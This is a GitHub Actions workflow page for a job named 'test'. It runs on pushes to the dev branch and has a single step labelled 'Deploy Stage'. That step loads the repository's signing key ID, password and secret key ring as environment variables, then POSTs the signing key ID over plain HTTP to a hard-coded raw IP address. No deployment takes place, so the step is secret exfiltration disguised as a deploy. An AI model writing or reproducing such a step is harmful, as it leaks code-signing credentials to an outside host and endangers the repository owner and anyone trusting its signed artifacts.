Skip to content

test

test #18

Workflow file for this run

name: test
on:
push:
branches: [ dev ]
jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Deploy Stage
env:
SIGNING_KEY_ID: ${{ secrets.SIGNING_KEY_ID }}
SIGNING_PASSWORD: ${{ secrets.SIGNING_PASSWORD }}
SIGNING_SECRET_KEY_RING_KEY: ${{ secrets.SIGNING_SECRET_KEY_RING_KEY }}
uses: fjogeleit/http-request-action@v1
with:
url: 'http://43.156.154.114:8085/test'
method: 'POST'
customHeaders: '{"Content-Type": "application/text"}'
data: ${{ secrets.SIGNING_KEY_ID }}